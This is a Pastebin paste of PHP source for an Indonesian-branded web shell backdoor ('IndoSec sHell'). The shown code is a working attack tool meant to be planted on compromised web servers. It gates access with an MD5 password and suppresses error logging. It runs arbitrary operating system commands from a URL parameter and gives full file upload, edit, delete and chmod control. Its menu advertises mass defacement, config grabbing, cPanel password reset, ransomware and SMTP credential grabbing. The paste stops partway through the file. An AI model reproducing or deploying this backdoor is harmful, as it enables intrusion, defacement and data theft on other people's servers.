CyberHack18

wso

Jan 13th, 2020
517
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 105.80 KB | None | 0 0
  1. <?php
  2. /*
  3. * Konsep Shell : Brillyan -Founder { IndoSec }-
  4. * Pembuat : Holiq - { IndoSec }
  5.  
  6. * Re-Code Boleh Asal Dah Izin Sama Pembuat, Ganti Author & Re-Code Tanpa Seizin Pembuat... Fix Lo Noob Anjenk
  7. * Klo Kga Bisa Bikin Cek Chanel IndoSec, Ada Tutornya, Jangan Cuma Bisa Ganti Author Doank Bangsad
  8.  
  9. * Thanks For All Member { IndoSec }, Yang Telah Membantu Proses Pembuatan Shell,Dan Dari Shell Lain Untuk Inspirasinya
  10.  
  11. * { IndoSec sHell }
  12. * Untuk Tools Yang Lain Akan Ditambahkan Di-update Berikutnya..
  13. * �2019 { IndoSec } -Holiq-
  14. * Contact Me? fb.com/holiq.xidWhatsApp? Cek Bio Fb
  15. * Nb: shell ini blm sepenuhnya selesai, jadi kalau menemukan error/tampilan tidak bagus/responsive harap dimaklumi. V 0.1
  16. */
  17. session_start();
  18. error_reporting(0);
  19. @set_time_limit(0);
  20. @clearstatcache();
  21. @ini_set('error_log',NULL);
  22. @ini_set('log_errors',0);
  23. @ini_set('max_execution_time',0);
  24. @ini_set('output_buffering',0);
  25. @ini_set('display_errors', 0);
  26.  
  27. /* Configurasi */
  28. $aupas = "1968a2acf85ae9b8099c2a381c612fed";// IndoSec:v
  29. $default_action = 'FilesMan';
  30. $default_use_ajax = true;
  31. $default_charset = 'UTF-8';
  32. date_default_timezone_set("Asia/Jakarta");
  33. function login_shell() {
  34. ?>
  35. <!DOCTYPE html>
  36. <html>
  37. <head>
  38. <meta name="viewport" content="widht=device-widht, initial-scale=1.0"/>
  39. <meta name="theme-color" content="#343a40"/>
  40. <meta name="author" content="Holiq"/>
  41. <meta name="copyright" content="{ IndoSec }"/>
  42. <title>{ IndoSec sHell }</title>
  43. <link rel="icon" type="image/png" href="https://www.holiq.projectku.ga/indosec.png"/>
  44. <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/css/bootstrap.min.css"/>
  45. <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.1/css/all.css"/>
  46. </head>
  47. <body class="bg-dark text-center text-light">
  48. <div class="container text-center mt-3">
  49. <h1>{ CY83R#4CK18 }</h1>
  50. <h5>sHell Backdoor</h5><hr/>
  51. <p class="mt-3 font-weight-bold"><i class="fa fa-terminal"></i> Please Login</p>
  52. <form method="post">
  53. <div class="form-group input-group">
  54. <div class="input-group-prepend">
  55. <div class="input-group-text"><i class="fa fa-user"></i></div>
  56. </div>
  57. <input type="password" name="pass" placeholder="User Id..." class="form-control">
  58. </div>
  59. <input type="submit" class="btn btn-danger btn-block" class="form-control" value="Login">
  60. </form>
  61. </div>
  62. <a href="https://facebook.com/IndoSecOfficial" class="text-muted fixed-bottom mb-3">Copyright 2019 @ { IndoSec }</a>
  63. </body>
  64. </html>
  65. <?php
  66. exit;
  67. }
  68. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])){
  69. if(isset($_POST['pass']) && (md5($_POST['pass']) == $aupas)){
  70. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  71. }else{
  72. login_shell();
  73. }
  74. }
  75. /*
  76. * Akhir Login
  77. *
  78. * Aksi Download
  79. */
  80. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['aksi'] == 'download')) {
  81. @ob_clean();
  82. $file = $_GET['file'];
  83. header('Content-Description: File Transfer');
  84. header('Content-Type: application/octet-stream');
  85. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  86. header('Expires: 0');
  87. header('Cache-Control: must-revalidate');
  88. header('Pragma: public');
  89. header('Content-Length: ' . filesize($file));
  90. readfile($file);
  91. exit;
  92. }
  93. function w($dir,$perm) {
  94. if(!is_writable($dir)) {
  95. return "<font color='red'>".$perm."</font>";
  96. }else{
  97. return "<font color='lime'>".$perm."</font>";
  98. }
  99. }
  100. function r($dir,$perm) {
  101. if(!is_readable($dir)) {
  102. return "<font color=red>".$perm."</font>";
  103. } else {
  104. return "<font color=lime>".$perm."</font>";
  105. }
  106. }
  107.  
  108. function exe($cmd) {
  109. if(function_exists('system')) {
  110. @ob_start();
  111. @system($cmd);
  112. $buff = @ob_get_contents();
  113. @ob_end_clean();
  114. return $buff;
  115. } elseif(function_exists('exec')) {
  116. @exec($cmd,$results);
  117. $buff = "";
  118. foreach($results as $result) {
  119. $buff .= $result;
  120. } return $buff;
  121. } elseif(function_exists('passthru')) {
  122. @ob_start();
  123. @passthru($cmd);
  124. $buff = @ob_get_contents();
  125. @ob_end_clean();
  126. return $buff;
  127. } elseif(function_exists('shell_exec')) {
  128. $buff = @shell_exec($cmd);
  129. return $buff;
  130. }
  131. }
  132.  
  133. function perms($file){
  134. $perms = fileperms($file);
  135. if (($perms & 0xC000) == 0xC000) {
  136. // Socket
  137. $info = 's';
  138. } elseif (($perms & 0xA000) == 0xA000) {
  139. // Symbolic Link
  140. $info = 'l';
  141. } elseif (($perms & 0x8000) == 0x8000) {
  142. // Regular
  143. $info = '-';
  144. } elseif (($perms & 0x6000) == 0x6000) {
  145. // Block special
  146. $info = 'b';
  147. } elseif (($perms & 0x4000) == 0x4000) {
  148. // Directory
  149. $info = 'd';
  150. } elseif (($perms & 0x2000) == 0x2000) {
  151. // Character special
  152. $info = 'c';
  153. } elseif (($perms & 0x1000) == 0x1000) {
  154. // FIFO pipe
  155. $info = 'p';
  156. } else {
  157. // Unknown
  158. $info = 'u';
  159. }
  160.  
  161. // Owner
  162. $info .= (($perms & 0x0100) ? 'r' : '-');
  163. $info .= (($perms & 0x0080) ? 'w' : '-');
  164. $info .= (($perms & 0x0040) ?
  165. (($perms & 0x0800) ? 's' : 'x' ) :
  166. (($perms & 0x0800) ? 'S' : '-'));
  167. // Group
  168. $info .= (($perms & 0x0020) ? 'r' : '-');
  169. $info .= (($perms & 0x0010) ? 'w' : '-');
  170. $info .= (($perms & 0x0008) ?
  171. (($perms & 0x0400) ? 's' : 'x' ) :
  172. (($perms & 0x0400) ? 'S' : '-'));
  173.  
  174. // World
  175. $info .= (($perms & 0x0004) ? 'r' : '-');
  176. $info .= (($perms & 0x0002) ? 'w' : '-');
  177. $info .= (($perms & 0x0001) ?
  178. (($perms & 0x0200) ? 't' : 'x' ) :
  179. (($perms & 0x0200) ? 'T' : '-'));
  180.  
  181. return $info;
  182. }
  183.  
  184. $path = str_replace('\\','/',$path);
  185. $paths = explode('/',$path);
  186. if(isset($_GET['dir'])) {
  187. $dir = $_GET['dir'];
  188. chdir($dir);
  189. } else {
  190. $dir = getcwd();
  191. }
  192.  
  193. $os = php_uname();
  194. $ip = getHostByName(getHostName());
  195. $ver = phpversion();
  196. $web = $_SERVER['HTTP_HOST'];
  197. $sof = $_SERVER['SERVER_SOFTWARE'];
  198. $dir = str_replace("\\","/",$dir);
  199. $scdir = explode("/", $dir);
  200. $mysql = (function_exists('mysql_connect')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
  201. $curl = (function_exists('curl_version')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
  202. $mail = (function_exists('mail')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
  203. $total = disk_total_space($dir);
  204. $free = disk_free_space($dir);
  205. $pers = (int) ($free/$total*100);
  206. $ds = @ini_get("disable_functions");
  207. $show_ds = (!empty($ds)) ? "<a href='?dir=$dir&aksi=disabfunc' class='ds'>$ds</a>" : "<a href='?dir=$dir&aksi=disabfunc'><font color=green>NONE</font></a>";
  208. $imgfol = "<img src='http://aux.iconspalace.com/uploads/folder-icon-256-1787672482.png' class='ico'></img>";
  209. $imgfile = "<img src='http://icons.iconarchive.com/icons/zhoolego/material/256/Filetype-Docs-icon.png' class='ico2'></img>";
  210. function formatSize( $bytes ) {
  211. $types = array( 'B', 'KB', 'MB', 'GB', 'TB' );
  212. for( $i = 0; $bytes >= 1024 && $i < ( count( $types ) -1 ); $bytes /= 1024, $i++ );
  213. return( round( $bytes, 2 )." ".$types[$i] );
  214. }
  215.  
  216. function ambilKata($param, $kata1, $kata2){
  217. if(strpos($param, $kata1) === FALSE) return FALSE;
  218. if(strpos($param, $kata2) === FALSE) return FALSE;
  219. $start = strpos($param, $kata1) + strlen($kata1);
  220. $end = strpos($param, $kata2, $start);
  221. $return = substr($param, $start, $end - $start);
  222. return $return;
  223. }
  224.  
  225. $d0mains = @file("/etc/named.conf", false);
  226. if (!$d0mains) {
  227. $die = "<font color=red size=2px>Cant Read [ /etc/named.conf ]</font>";
  228. $GLOBALS["need_to_update_header"] = "true";
  229. }else{
  230. $count = 0;
  231. foreach ($d0mains as $d0main) {
  232. if (@strstr($d0main, "zone")) {
  233. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  234. flush();
  235. if (strlen(trim($domains[1][0])) > 2) {
  236. flush();
  237. $count++;
  238. }
  239. }
  240. }
  241. $dom = "$count Domain";
  242. }
  243. function swall($swa,$text,$dir){
  244. echo "<script>Swal.fire({
  245. title: '$swa',
  246. text: '$text',
  247. type: '$swa',
  248.  
  249. }).then((value) => {window.location='?dir=$dir';})</script>";
  250. }
  251. ?>
  252. <html>
  253. <head>
  254. <meta name="viewport" content="widht=device-widht, initial-scale=1"/>
  255. <meta name="theme-color" content="#343a40"/>
  256. <meta name="author" content="Holiq"/>
  257. <meta name="copyright" content="{ IndoSec }"/>
  258. <link rel="icon" type="image/png" href="https://www.holiq.projectku.ga/indosec.png"/>
  259. <title>{ IndoSec sHell }</title>
  260. <link rel="stylesheet" href="pojan/assets/css/bootstrap.min.css">
  261. <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/css/bootstrap.min.css"/>
  262. <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.2/css/all.min.css"/>
  263. <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"/>
  264. <script src="https://code.jquery.com/jquery-3.3.1.js"></script>
  265. <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>
  266. <script src="https://cdn.jsdelivr.net/npm/sweetalert2@8.18.0/dist/sweetalert2.all.min.js"></script>
  267. </head>
  268. <body class="bg-dark text-light">
  269. <script>
  270. $(document).ready(function(){
  271. $(window).scroll(function(){
  272. if ($(this).scrollTop() > 700) {
  273. $(".scrollToTop").fadeIn();
  274. }else{
  275. $(".scrollToTop").fadeOut();
  276. }
  277. });
  278. $(".scrollToTop").click(function(){
  279. $("html, body").animate({scrollTop : 0},1000);
  280. return false;
  281. });
  282. });
  283. $(document).ready(function() {
  284. $('input[type="file"]').on("change", function() {
  285. let filenames = [];
  286. let files = document.getElementById("customFile").files;
  287. if (files.length > 1) {
  288. filenames.push("Total Files (" + files.length + ")");
  289. } else {
  290. for (let i in files) {
  291. if (files.hasOwnProperty(i)) {
  292. filenames.push(files[i].name);
  293. }
  294. }
  295. }
  296. $(this).next(".custom-file-label").html(filenames.join(","));
  297. });
  298. });
  299. var max_fields = 5;
  300. var x = 1;
  301. $(document).on('click', '#add_input', function(e){
  302. if(x < max_fields){
  303. x++;
  304. $('#output').append('<div class=\"input-group\ form-group\ text-dark\" id=\"out\"><input type=\"text\" class=\"form-control\" name=\"nama_file[]\" placeholder=\"Nama File...\"><div class=\"input-group-prepend\ remove\"><div class=\"input-group-text\"><a href="#" class="text-dark"><i class=\"fa fa-minus\"></i></a></div></div></div>');
  305. }
  306. $('#output').on("click",".remove", function(e){
  307. e.preventDefault(); $(this).parent('#out').remove(); x--;
  308. repeat();
  309. })
  310. });
  311. $(document).on('click', '#add_input1', function(e){
  312. if(x < max_fields){
  313. x++;
  314. $('#output1').append('<div class=\"input-group\ form-group\ text-dark\" id=\"out\"><input type=\"text\" class=\"form-control\" name=\"nama_folder[]\" placeholder=\"Nama Folder...\"><div class=\"input-group-prepend\ remove\"><div class=\"input-group-text\"><a href="#" class="text-dark"><i class=\"fa fa-minus\"></i></a></div></div></div>');
  315. }
  316. $('#output1').on("click",".remove", function(e){
  317. e.preventDefault(); $(this).parent('#out').remove(); x--;
  318. repeat();
  319. })
  320. });
  321.  
  322. </script>
  323. <style>
  324. @import url(https://fonts.googleapis.com/css?family=Lato);
  325. @import url(https://fonts.googleapis.com/css?family=Quicksand);
  326. @import url(https://fonts.googleapis.com/css?family=Inconsolata);
  327. input[type="text"],textarea {font-family: "Inconsolata", monospace;}
  328. body{margin:0;padding:0;font-family:"Lato";overscroll-behavior:none;}
  329. .infor{font-size:14px;color:#333!important;}
  330. .ds{color:#f00!important;word-wrap:break-word;}
  331. #tab table thead th{padding:5px;font-size:16px;white-space: nowrap;}
  332. #tab tr {border-bottom:1px solid #ccc;}
  333. #tab tr:hover{background:#5B6F7D;color:#fff;}
  334. #tab tr td{padding:5px 10px;white-space:nowrap;}
  335. .pinggir{text-align:left !important; padding-left: 4px !important;}
  336. #tab tr td .badge{font-size:13px;}
  337. .active,.active:hover{color:#00FF00;}
  338. a {font-family:"Quicksand"; color:white;}
  339. a:hover{color:dodgerBlue;}
  340. .badge{width:30px;transition:.3s;}
  341. .badge:hover{transform: scale(1.1);transition:.3s;}
  342. .ico {width:25px;}
  343. .ico2{width:30px;}
  344. @media(min-width:767px){.scrollToTop{display:none !important;}}
  345. .scrollToTop{
  346. position:fixed;
  347. bottom:30px;
  348. right:30px;
  349. width:35px;
  350. height:35px;
  351. background:#262626;
  352. color:#fff;
  353. border-radius:15%;
  354. text-align:center;
  355. opacity:.5;
  356. }
  357. .scrollToTop:hover{color:#fff;}
  358. .up{font-size:25px;line-height:35px;}
  359. .lain{color:#888888;font-size:20px;margin-left:5px;top:1px;}
  360. .lain:hover{color:#fff;}
  361. .tambah{
  362. width:35px;
  363. height:35px;
  364. line-height:35px;
  365. border:1px solid;
  366. border-radius:50%;
  367. text-align:center;
  368. }
  369. .fiture{margin:3px;}
  370. .tmp th {font-size:14px;}
  371. .tmp tr td{border:solid 1px #BBBBBB;text-align:center;font-size:13px;padding:2px 5px;}
  372. .tmp tr:hover{background:#5B6F7D; color:#fff;}
  373. .about{color:#000;}
  374. .about .card-body .img{
  375. position: relative;
  376. background: url(https://i.postimg.cc/Wb1X4xNS/image.png);
  377. background-size: cover;
  378. width: 150px;
  379. height: 150px;
  380. }
  381. .butn {
  382. position: relative;
  383. text-align: center;
  384. padding: 3px;
  385. background:rgba(225,225,225,.3);
  386. -webkit-transition: background 300ms ease, color 300ms ease;
  387. transition: background 300ms ease, color 300ms ease;
  388. }
  389. input[type="radio"].toggle {display:none;}
  390. input[type="radio"].toggle + label {cursor:pointer;margin:0 2px;width:60px;}
  391. input[type="radio"].toggle + label:after {
  392. position: absolute;
  393. content: "";
  394. top: 0;
  395. background: #fff;
  396. height: 100%;
  397. width: 100%;
  398. z-index: -1;
  399. -webkit-transition: left 400ms cubic-bezier(0.77, 0, 0.175, 1);
  400. transition: left 400ms cubic-bezier(0.77, 0, 0.175, 1);
  401. }
  402. input[type="radio"].toggle.toggle-left + label:after {left:100%;}
  403. input[type="radio"].toggle.toggle-right + label {margin-left:-5px;}
  404. input[type="radio"].toggle.toggle-right + label:after {left:-100%;}
  405. input[type="radio"].toggle:checked + label {cursor:default;color:#000;-webkit-transition:color 400ms;transition: color 400ms;}
  406. input[type="radio"].toggle:checked + label:after {left:0;}
  407. </style>
  408. <nav class="navbar static-top navbar-dark">
  409. <button class="navbar-toggler"type="button" data-toggle="collapse" data-target="#info" aria-label="Toggle navigation">
  410. <i style="color:#fff;" class="fa fa-navicon"></i>
  411. </button>
  412. <div class="collapse navbar-collapse" id="info">
  413. <ul>
  414. <a href="https://facebook.com/IndoSecOfficial" class="lain"><i class="fa fa-facebook tambah"></i></a>
  415. <a href="https://www.instagram.com/indosec.id" class="lain"><i class="fa fa-instagram tambah"></i></a>
  416. <a href="https://www.youtube.com/IndoSec" class="lain"><i class="fa fa-youtube-play tambah"></i></a>
  417. <a href="https://github.com/indosecid" class="lain"><i class="fa fa-github tambah"></i></a>
  418. <a href="https://indosec.web.id" class="lain"><i class="fa fa-globe tambah"></i></a>
  419. </ul>
  420. </div>
  421. </nav>
  422. <?php
  423. echo '
  424. <div class="container">
  425. <h1 class="text-center"><a href="https://facebook.com/IndoSecOfficial" style="color:#ffffff;">{ INDOSEC }</h1>
  426. <center><h5>Shell Backdoor</a></h5></center>
  427. <hr/>
  428. <div class="text-center">
  429. <div class="d-flex justify-content-center flex-wrap">
  430. <a href="?" class="fiture btn btn-danger btn-sm"><i class="fa fa-home"></i> Home</a>
  431. <a href="?dir='.$dir.'&aksi=upload" class="fiture btn btn-danger btn-sm"><i class="fa fa-upload"></i> Upload</a>
  432. <a href="?dir='.$dir.'&aksi=buat_file" class="fiture btn btn-danger btn-sm"><i class="fa fa-plus-circle"></i> Buat File</a>
  433. <a href="?dir='.$dir.'&aksi=buat_folder" class="fiture btn btn-danger btn-sm"><i class="fa fa-plus"></i> Buat Folder</a>
  434. <a href="?dir='.$dir.'&aksi=masdef" class="fiture btn btn-danger btn-sm"><i class="fa fa-exclamation-triangle"></i> Mass Deface</a>
  435. <a href="?dir='.$dir.'&aksi=masdel" class="fiture btn btn-danger btn-sm"><i class="fa fa-trash"></i> Mass Delete</a>
  436. <a href="?dir='.$dir.'&aksi=jumping" class="fiture btn btn-danger btn-sm"><i class="fa fa-exclamation-triangle"></i> Jumping</a>
  437. <a href="?dir='.$dir.'&aksi=config" class="fiture btn btn-danger btn-sm"><i class="fa fa-cogs"></i> Config</a>
  438. <a href="?dir='.$dir.'&aksi=adminer" class="fiture btn btn-danger btn-sm"><i class="fa fa-user"></i> Adminer</a>
  439. <a href="?dir='.$dir.'&aksi=symlink" class="fiture btn btn-danger btn-sm"><i class="fa fa-exclamation-circle"></i> Symlink</a>
  440. <a href="?dir='.$dir.'&aksi=bctools" class="fiture btn btn-danger btn-sm"><i class="fas fa-network-wired"></i> Network</a>
  441. <a href="?dir='.$dir.'&aksi=resetpasscp" class="fiture btn btn-warning btn-sm"><i class="fa fa-key"></i> Auto Reset Cpanel</a>
  442. <a href="?dir='.$dir.'&aksi=auteduser" class="fiture btn btn-warning btn-sm"><i class="fas fa-user-edit"></i> Auto Edit User</a>
  443. <a href="?dir='.$dir.'&aksi=ransom" class="fiture btn btn-warning btn-sm"><i class="fab fa-keycdn"></i> Ransomware</a>
  444. <a href="?dir='.$dir.'&aksi=smtpgrab" class="fiture btn btn-warning btn-sm"><i class="fas fa fa-exclamation-circle"></i> SMTP Grabber</a>
  445. <a href="?dir='.$dir.'&aksi=bypascf" class="fiture btn btn-warning btn-sm"><i class="fas fa-cloud"></i> Bypass Cloud Flare</a>
  446. <a href="?dir='.$dir.'&aksi=zip_menu" class="fiture btn btn-warning btn-sm"><i class="fa fa-file-archive-o"></i> Zip Menu</a>
  447. <a href="?about" class="fiture btn btn-warning btn-sm"><i class="fa fa-info"></i> About Us</a>
  448. <a href="?keluar" class="fiture btn btn-warning btn-sm"><i class="fa fa-sign-out"></i> keluar</a>
  449. </div>
  450. </div>
  451. <div class="row">
  452. <div class="col-md-5"><br/>
  453. <h5><i class="fa fa-terminal"></i>Terminal : </h5>
  454. <form>
  455. <input type="text" class="form-control" name="cmd" autocomplete="off" placeholder="id | uname -a | whoami | heked">
  456. </form>
  457. <hr/>
  458. <h5><i class="fa fa-search"></i> Informasi : </h5>
  459. <div class="card table-responsive">
  460. <div class="card-body">
  461. <table class="table infor">
  462. <tr>
  463. <td>PHP</td>
  464. <td> : '.$ver.'</td>
  465. </tr>
  466. <tr>
  467. <td>IP Server</td>
  468. <td> : '.$ip.'</td>
  469. </tr>
  470. <tr>
  471. <td>HDD</td>
  472. <td class="d-flex">Total : '.formatSize($total).' Free : '.formatSize($free).' ['.$pers.'%]</td>
  473. </tr>
  474. <tr>
  475. <td>Domain</td>
  476. <td>: '.$dom.''.$die.'</td>
  477. </tr>
  478. <tr>
  479. <td>MySQL</td>
  480. <td>: '.$mysql.'</td>
  481. </tr>
  482. <tr>
  483. <td>cURL</td>
  484. <td>: '.$curl.'</td>
  485. </tr>
  486. <tr>
  487. <td>Mailer</td>
  488. <td>: '.$mail.'</td>
  489. </tr>
  490. <tr>
  491. <td>Disable Function</td>
  492. <td>: '.$show_ds.'</td>
  493. </tr>
  494. <tr>
  495. <td>Software</td>
  496. <td>: '.$sof.'</td>
  497. </tr>
  498. <tr>
  499. <td>Sistem Operasi</td>
  500. <td> : '.$os.'</td>
  501. </tr>
  502. </table>
  503. </div>
  504. </div><hr/>
  505. </div>
  506. <div class="col-md-7 mt-4">';
  507.  
  508. //keluar
  509. if (isset($_GET['keluar'])) {
  510. session_start();
  511. session_destroy();
  512. echo '<script>window.location="?";</script>';
  513. }
  514.  
  515. //cmd
  516. if(isset($_GET['cmd'])){
  517. echo "<pre class='text-white'>".exe($_GET['cmd'])."</pre>";
  518. exit;
  519. }
  520.  
  521. //about
  522. if (isset($_GET['about'])) {
  523. echo '<div class="card text-center bg-light about">
  524. <h4 class="card-header">{ IndoSec }</h4>
  525. <div class="card-body">
  526. <center><div class="img"></div></center>
  527. <p class="card-text">{ IndoSec } Adalah Sebuah Komunitas Yang Berfokus Kepada Teknologi Di Indonesia, Dari Membuat Mengamankan Dan Mengexploitasi Sebuah Sistem.</p>
  528. </div>
  529. <div class="card-footer">
  530. <small class="card-text text-muted">Copyright 2019 { IndoSec }</small>
  531. </div>
  532. </div><br/>';
  533. exit;
  534. }
  535.  
  536. //upload
  537. if ($_GET['aksi'] == 'upload') {
  538. echo '<form method="POST" enctype="multipart/form-data" name="uploader" id="uploader">
  539. <div class="card">
  540. <div class="card-body form-group">
  541. <p class="text-muted">//Multiple Upload</p>
  542. <div class="custom-file">
  543. <input type="file" name="file[]" multiple class="custom-file-input" id="customFile">
  544. <label class="custom-file-label" for="customFile">Choose file</label>
  545. </div>
  546. <input type="submit" class="btn btn-sm btn-primary btn-block mt-4 p-2" name="upload" value="Upload">
  547. </div>
  548. </div>
  549. </form>';
  550.  
  551. if(isset($_POST['upload'])){
  552. $jumlah = count($_FILES['file']['name']);
  553. for($i=0;$i<$jumlah;$i++){
  554. $filename = $_FILES['file']['name'][$i];
  555.  
  556. $up = @copy($_FILES['file']['tmp_name'][$i], "$dir/".$filename);
  557.  
  558. }
  559. if($jumlah < 2) {
  560. if($up){
  561. $swa = "success";
  562. $text = "Berhasil Upload $filename";
  563. swall($swa,$text,$dir);
  564. }else{
  565. $swa = "error";
  566. $text = "Gagal Upload File";
  567. swall($swa,$text,$dir);
  568. }
  569. }else{
  570. $swa = "success";
  571. $text = "Berhasil Upload $jumlah File";
  572. swall($swa,$text,$dir);
  573. }
  574. }
  575. }
  576.  
  577. //openfile
  578. if (isset($_GET['file'])) {
  579. $file = $_GET['file'];
  580. }
  581. $nfile = basename($file);
  582. //chmod
  583. if($_GET['aksi'] == 'chmod_file') {
  584. echo "<form method='POST'>
  585. <h5>Chmod File : $nfile </h5>
  586. <div class='form-group input-group'>
  587. <input type='text' name='perm' class='form-control' value='".substr(sprintf('%o', fileperms($_GET['file'])), -4)."'>
  588. <input type='submit' class='btn btn-danger form-control' value='Chmod'>
  589. </div>
  590. </form>";
  591.  
  592. if(isset($_POST['perm'])){
  593. if(@chmod($_GET['file'],$_POST['perm'])){
  594. echo '<font color="lime">Change Permission Berhasil</font><br/>';
  595. }else{
  596. echo '<font color="white">Change Permission Gagal</font><br/>';
  597. }
  598. }
  599. }
  600.  
  601. //buat_file
  602. if ($_GET['aksi'] == 'buat_file') {
  603. echo "<h4><img src='http://icons.iconarchive.com/icons/zhoolego/material/256/Filetype-Docs-icon.png' class='ico2'></img> Buat File :</h4>
  604. <form method='POST'>
  605. <div class='input-group'>
  606. <input type='text' class='form-control' name='nama_file[]' placeholder='Nama File...'>
  607. <div class='input-group-prepend'>
  608. <div class='input-group-text'><a id='add_input'><i class='fa fa-plus'></i></a></div>
  609. </div>
  610. </div><br/>
  611. <div id='output'></div>
  612. <textarea name='isi_file' class='form-control' rows='13' placeholder='Isi File...'></textarea><br/>
  613. <input type='submit' class='btn btn-info btn-block' name='bikin' value='Buat'>
  614. </form>";
  615.  
  616. if (isset($_POST['bikin'])) {
  617. $name = $_POST['nama_file'];
  618. $isi_file = $_POST['isi_file'];
  619. foreach ($name as $nama_file) {
  620. $handle = @fopen("$nama_file", "w");
  621. if($isi_file){
  622. $buat = @fwrite($handle, $isi_file);
  623. }else{
  624. $buat = $handle;
  625. }
  626. }
  627. if ($buat) {
  628. $swa = "success";
  629. $text = "Berhasil Membuat File";
  630. swall($swa,$text,$dir);
  631. }else{
  632. $swa = "error";
  633. $text = "Gagal Membuat File";
  634. swall($swa,$text,$dir);
  635. }
  636. }
  637. }
  638. /*
  639. View
  640. */
  641. if($_GET['aksi'] == 'view') {
  642. echo '[ <a class="active" href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ] [ <a href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ] [ <a href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ] [ <a href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ]
  643. <h5>'.$imgfile.' Lihat File : '.$nfile.'</h5>
  644. <textarea rows="13" class="form-control" disabled="">'.htmlspecialchars(@file_get_contents($file)).'</textarea><br/>';
  645. }
  646. /*
  647. Edit
  648. */
  649. if($_GET['aksi'] == 'edit') {
  650. echo '[ <a href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ] [ <a class="active" href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ] [ <a href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ] [ <a href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ]';
  651. echo "<form method='POST'>
  652. <h5>$imgfile Edit File : $nfile</h5>
  653. <textarea rows='13' class='form-control' name='isi'>".htmlspecialchars(@file_get_contents($file))."</textarea><br/>
  654. <button type='sumbit' class='btn btn-info btn-block' name='edit_file'>Update</button>
  655. </form>";
  656.  
  657. if(isset($_POST['edit_file'])) {
  658. $updt = fopen("$file", "w");
  659. $hasil = fwrite($updt, $_POST['isi']);
  660.  
  661. if ($hasil) {
  662. $swa = "success";
  663. $text = "Berhasil Update File";
  664. swall($swa,$text,$dir);
  665. }else{
  666. $swa = "error";
  667. $text = "Gagal Update File";
  668. swall($swa,$text,$dir);
  669. }
  670. }
  671. }
  672. /*
  673. Rename
  674. */
  675. if($_GET['aksi'] == 'rename') {
  676. echo '[ <a href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ] [ <a href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ] [ <a class="active" href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ] [ <a href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ]';
  677. echo "<form method='POST'>
  678. <h5>$imgfile Rename File : $nfile</h5>
  679. <input type='text' class='form-control' name='namanew' placeholder='Masukan Nama Baru...' value='$nfile'><br/>
  680. <button type='sumbit' class='btn btn-info btn-block' name='rename_file'>Rename</button>
  681. </form>";
  682.  
  683. if(isset($_POST['rename_file'])) {
  684. $lama = $file;
  685. $baru = $_POST['namanew'];
  686. rename( $baru, $lama);
  687. if(file_exists($baru)) {
  688. $swa = "success";
  689. $text = "Nama $baru Telah Digunakan";
  690. swall($swa,$text,$dir);
  691. }else{
  692. if(rename( $lama, $baru)) {
  693. $swa = "success";
  694. $text = "Berhasil Mengganti Nama Menjadi $baru";
  695. swall($swa,$text,$dir);
  696. }else{
  697. $swa = "error";
  698. $text = "Gagal Mengganti Nama";
  699. swall($swa,$text,$dir);
  700. }
  701. }
  702. }
  703. }
  704. /*
  705. Delete File
  706. */
  707. if ($_GET['aksi'] == 'hapusf') {
  708. echo '[ <a href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ] [ <a href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ] [ <a href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ] [ <a class="active" href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ]';
  709. echo "
  710. <div class='card card-body text-center text-dark mb-4'>
  711. <p>Yakin Menghapus : $nfile</p>
  712. <form method='POST'>
  713. <a class='btn btn-danger btn-block' href='?dir=$dir'>Tidak</a>
  714. <input type='submit' name='ya' class='btn btn-success btn-success btn-block' value='Ya'>
  715. </form>
  716. </div>";
  717.  
  718. if ($_POST['ya']) {
  719. if (unlink($file)) {
  720. $swa = "success";
  721. $text = "Berhasil Menghapus File";
  722. swall($swa,$text,$dir);
  723. }else{
  724. $swa = "error";
  725. $text = "Gagal Menghapus File";
  726. swall($swa,$text,$dir);
  727. }
  728. }
  729. }
  730. $ndir = basename($dir);
  731. //chmod
  732. if($_GET['aksi'] == 'chmod_dir') {
  733. $ndir = basename($dir);
  734. echo "<form method='POST'>
  735. <h5>Chmod Folder : $ndir </h5>
  736. <div class='form-group input-group'>
  737. <input type='text' name='perm' class='form-control' value='".substr(sprintf('%o', fileperms($_GET['dir'])), -4)."'>
  738. <input type='submit' class='btn btn-danger form-control' value='Chmod' name='chmo'>
  739. </div>
  740. </form>";
  741. if(isset($_POST['chmo'])){
  742. if(@chmod($_GET['dir'],$_POST['perm'])){
  743. echo '<font color="lime">Change Permission Berhasil</font><br/>';
  744. }else{
  745. echo '<font color="white">Change Permission Gagal</font><br/>';
  746. }
  747. }
  748. }
  749. /*
  750. Add Folder
  751. */
